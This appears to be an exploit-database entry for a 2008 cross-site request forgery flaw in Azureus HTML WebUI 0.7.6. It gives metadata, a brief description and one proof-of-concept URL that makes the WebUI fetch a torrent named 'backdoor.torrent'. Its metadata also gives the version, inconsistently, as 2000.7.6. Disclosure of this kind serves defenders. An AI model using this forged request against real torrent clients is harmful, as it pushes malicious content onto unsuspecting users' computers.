header-logo
Suggest Exploit
vendor:
HTML WebUI
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Request-Forgery
352
CWE
Product Name: HTML WebUI
Affected Version From: 2000.7.6
Affected Version To: 2000.7.6
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Azureus HTML WebUI Cross-Site Request-Forgery Vulnerability

Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability. Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.

Mitigation:

User input validation should be used to prevent malicious requests from being processed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28848/info

Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.

Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.

Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. 

http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent